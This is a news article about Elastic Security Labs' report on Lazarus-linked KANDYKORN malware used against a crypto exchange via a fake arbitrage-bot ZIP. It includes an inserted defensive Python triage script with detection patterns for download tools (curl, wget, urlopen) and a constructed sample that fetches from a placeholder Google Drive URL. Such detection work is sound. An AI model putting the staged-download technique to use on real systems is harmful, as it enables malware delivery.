
Hackers allied to the Lazarus Group targeted a digital asset exchange in April with new malware dubbed ‘KANDYKORN,’ a new report has revealed.

The Dutch firm Elastic Security Labs revealed that the attackers lured the engineers of an unnamed digital asset exchange via a public Discord channel. They led the victims to believe they were downloading an arbitrage bot.

However, upon decompressing, the ZIP archive revealed a ‘Main.py’ script and an accompanying folder containing over a dozen other malicious Python scripts.

The infection chain moved quickly: the script reached out to a Google Drive URL and downloaded further malicious content from it. The five-stage infiltration ended with the installation of KANDYKORN, a malware that gave the attackers advanced data access capabilities, Elastic revealed.
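To illustrate the lure layout described above from a defender's side, here is an added triage script (not from the original article and not Elastic's code) that inspects a ZIP archive for Python scripts which both fetch remote content and reference a Google Drive URL; the sample archive, file names and the placeholder file ID are constructed for the example.

```python
import io
import re
import zipfile

# Constructed heuristic for triaging an archive like the one described above:
# a ZIP holding a Main.py plus a folder of Python scripts, one of which
# fetches additional content from a Google Drive URL.
DRIVE_URL_RE = re.compile(r"https?://(?:drive|docs)\.google\.com/[^\s'\"]+")
FETCH_RE = re.compile(r"\b(?:urlopen|urlretrieve|requests\.get|curl|wget)\b")


def triage_zip(data: bytes) -> dict:
    """Summarise Python scripts inside a ZIP (given as bytes) and flag any
    script that both downloads remote content and references Google Drive."""
    findings = {"python_scripts": [], "flagged": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".py"):
                continue
            findings["python_scripts"].append(info.filename)
            text = zf.read(info).decode("utf-8", errors="replace")
            urls = DRIVE_URL_RE.findall(text)
            if urls and FETCH_RE.search(text):
                findings["flagged"].append({"file": info.filename, "urls": urls})
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive mimicking the lure layout (benign stand-in,
    not real malware); the Drive file ID is a placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Main.py", "from bot import run\nrun()\n")
        zf.writestr("bot/__init__.py", "")
        zf.writestr(
            "bot/stage1.py",
            "from urllib.request import urlopen\n"
            "URL = 'https://drive.google.com/uc?id=PLACEHOLDER_FILE_ID'\n"
            "payload = urlopen(URL).read()\n",
        )
        zf.writestr("bot/math.py", "def spread(a, b):\n    return b - a\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_zip(build_sample_zip()))
```

A hit only says the archive deserves a closer look in a sandbox; legitimate tooling also downloads from Drive, so treat the flag as a triage signal, not a verdict.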

“KANDYKORN is an advanced implant with a variety of capabilities to monitor, interact with, and avoid detection. It utilizes reflective loading, a direct-memory form of execution that may bypass detections,” the report summarizes.

Elastic didn’t reveal the identity of the exchange the hackers targeted, but it disclosed the attack was in April. That month, the biggest attack on a digital asset exchange was on Bitrue, a Singaporean entity that lost $23 million to the attack. Bitrue didn’t reveal further details about the attack but claimed that the hackers stole less than 5% of total assets and that only its hot wallets had been compromised.

South Korean exchange GDAC also suffered a breach, losing $13 million. The hackers later laundered the proceeds through Tornado Cash, the Ethereum-based mixer whose founders were arrested and charged with conspiracy to commit money laundering and evade sanctions.

“The DPRK, via units like the LAZARUS GROUP, continues to target crypto-industry businesses with the goal of stealing cryptocurrency in order to circumvent international sanctions that hinder the growth of their economy and ambitions,” Elastic added.

North Korea has long relied on mixers to cash out its ill-gotten proceeds. However, in recent times, the country’s hackers have reportedly turned to Russian exchanges as ties between the two nations grow tighter.

According to Chainalysis, there has been a “significant escalation in the partnership between the cyber underworlds of these two nations.” And with Russia known for being notoriously uncooperative with international law enforcement agencies, Korean hackers could have an extra layer to hide under.
